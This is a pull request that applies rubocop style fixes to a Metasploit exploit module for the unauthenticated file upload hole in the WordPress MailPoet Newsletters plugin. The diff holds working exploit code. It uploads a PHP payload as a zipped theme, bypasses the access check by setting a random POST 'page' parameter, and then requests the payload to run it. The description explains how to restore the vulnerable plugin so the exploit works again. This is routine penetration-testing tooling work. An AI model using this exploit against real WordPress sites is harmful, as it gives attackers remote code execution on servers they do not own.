### PR TITLE
Applied rubocop changes to wp_wysija plugin

### DIFF
--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -1,3 +1,5 @@
+# encoding: UTF-8
+
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
@@ -12,7 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
       'Description'    => %q{
           The Wordpress plugin "MailPoet Newsletters" (wysija-newsletters) before 2.6.8
@@ -34,14 +37,14 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
-          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
-          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
+          ['URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html'],
+          ['URL', 'http://www.mailpoet.com/security-update-part-2/'],
+          ['URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
-      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
+      'Targets'        => [['wysija-newsletters < 2.6.8', {}]],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 1 2014'))
   end
@@ -58,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
     }
 
     zip_file = Rex::Zip::Archive.new
-    content.each_pair do |name, content|
-      zip_file.add_file(name, content)
+    content.each_pair do |name, con|
+      zip_file.add_file(name, con)
     end
 
     zip_file.pack
@@ -67,14 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     readme_url = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wysija-newsletters', 'readme.txt')
-    res = send_request_cgi({
+    res = send_request_cgi(
       'uri'    => readme_url,
       'method' => 'GET'
-    })
+    )
     # no readme.txt present
-    if res.nil? || res.code != 200
-      return Msf::Exploit::CheckCode::Unknown
-    end
+    return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200
 
     # try to extract version from readme
     # Example line:
@@ -82,9 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
     version = res.body.to_s[/stable tag: ([^\r\n"\']+\.[^\r\n"\']+)/i, 1]
 
     # readme present, but no version number
-    if version.nil?
-      return Msf::Exploit::CheckCode::Detected
-    end
+    return Msf::Exploit::CheckCode::Detected if version.nil?
 
     print_status("#{peer} - Found version #{version} of the plugin")
 
@@ -114,13 +113,13 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_uri = normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wysija', 'themes', theme_name, payload_name)
 
     print_status("#{peer} - Uploading payload to #{payload_uri}")
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method'   => 'POST',
       'uri'      => uri,
       'ctype'    => "multipart/form-data; boundary=#{data.bound}",
       'vars_get' => { 'page' => 'wysija_campaigns', 'action' => 'themes' },
       'data'     => post_data
-    })
+    )
 
     if res.nil? || res.code != 302 || res.headers['Location'] != 'admin.php?page=wysija_campaigns&action=themes&reload=1&redirect=1'
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
@@ -135,9 +134,9 @@ class Metasploit3 < Msf::Exploit::Remote
     print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.")
 
     print_status("#{peer} - Executing payload #{payload_uri}")
-    res = send_request_cgi({
+    send_request_cgi(
       'uri'    => payload_uri,
       'method' => 'GET'
-    })
+    )
   end
 end

--- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
+++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb
@@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
           a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
           uses $_REQUEST to check for access rights. By setting the POST parameter to
           something not beginning with 'wysija_', the check is bypassed. Wordpress uses
-          the $_GET array to determine the page, so it is not affected by this.
+          the $_GET array to determine the page, so it is not affected by this. The developers
+          applied the fixes to all previous versions too.
       },
       'Author'         =>
         [
@@ -85,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
     # readme present, but no version number
     return Msf::Exploit::CheckCode::Detected if version.nil?
 
-    print_status("#{peer} - Found version #{version} of the plugin")
+    vprint_status("#{peer} - Found version #{version} of the plugin")
 
     if Gem::Version.new(version) < Gem::Version.new('2.6.8')
       return Msf::Exploit::CheckCode::Appears
@@ -107,6 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    # this line bypasses the check implemented in version 2.6.7
     data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s
 


### PR DESCRIPTION
I applied the rubocop suggested fixes to the file, changed the check message to a verbose one and added some comments. To test, you need to reverse patch the downloaded plugin because the developers applied the fix to all previous versions on their corresponding tags :(
### Instructions
- [x] Download `http://downloads.wordpress.org/plugin/wysija-newsletters.2.6.7.zip`
- [x] install it
- [x] save the following to your wp-content/plugins/ folder: `wysija.patch`

```
--- a/wysija-newsletters/helpers/back.php
+++ b/wysija-newsletters/helpers/back.php
@@ -179,7 +179,7 @@
      */
     function verify_capability(){
+        if( isset( $_REQUEST['page'] ) && substr( $_REQUEST['page'] ,0 ,7 ) == 'wysija_' ){
+
+            switch( $_REQUEST['page'] ){
-        if( isset( $_GET['page'] ) && substr( $_GET['page'] ,0 ,7 ) == 'wysija_' ){
-
-            switch( $_GET['page'] ){
                 case 'wysija_campaigns':
                     $role_needed = 'wysija_newsletters';
```
- [ ] Apply it via `patch -p1 < wysija.patch`

And the exploit should work again.
### Output

![exploit](https://cloud.githubusercontent.com/assets/105281/3631654/49172c48-0eb9-11e4-9ccb-6920520e99d5.png)
### Rubocop Warnings generated

```
Inspecting 1 file
W

Offenses:

modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:1:1: C: Missing utf-8 encoding comment.
##
^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:16:7: C: Align the parameters of a method call if they span more than one line.
      'Name'           => 'Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload',
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:37:12: C: Space inside square brackets detected.
          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:37:121: C: Space inside square brackets detected.
          [ 'URL', 'http://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html' ],
                                                                                                                        ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:38:12: C: Space inside square brackets detected.
          [ 'URL', 'http://www.mailpoet.com/security-update-part-2/'],
           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:39:12: C: Space inside square brackets detected.
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/943427/wysija-newsletters/trunk/helpers/back.php']
           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:44:28: C: Space inside square brackets detected.
      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
                           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:44:63: C: Space inside square brackets detected.
      'Targets'        => [ ['wysija-newsletters < 2.6.8', {}] ],
                                                              ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:61:33: W: Shadowing outer local variable - content.
    content.each_pair do |name, content|
                                ^^^^^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:70:28: C: Redundant curly braces around a hash parameter.
    res = send_request_cgi({
                           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:71:7: C: Use 2 spaces for indentation in a hash, relative to the first position after the preceding left parenthesis.
      'uri'    => readme_url,
      ^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:73:5: C: Indent the right brace the same as the first position after the preceding left parenthesis.
    })
    ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:75:5: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
    if res.nil? || res.code != 200
    ^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:85:5: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
    if version.nil?
    ^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:117:28: C: Redundant curly braces around a hash parameter.
    res = send_request_cgi({
                           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:118:7: C: Use 2 spaces for indentation in a hash, relative to the first position after the preceding left parenthesis.
      'method'   => 'POST',
      ^^^^^^^^^^^^^^^^^^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:123:5: C: Indent the right brace the same as the first position after the preceding left parenthesis.
    })
    ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:138:5: W: Useless assignment to variable - res.
    res = send_request_cgi({
    ^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:138:28: C: Redundant curly braces around a hash parameter.
    res = send_request_cgi({
                           ^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:139:7: C: Use 2 spaces for indentation in a hash, relative to the first position after the preceding left parenthesis.
      'uri'    => payload_uri,
      ^^^^^^^^^^^^^^^^^^^^^^^
modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb:141:5: C: Indent the right brace the same as the first position after the preceding left parenthesis.
    })
    ^

1 file inspected, 21 offenses detected
```
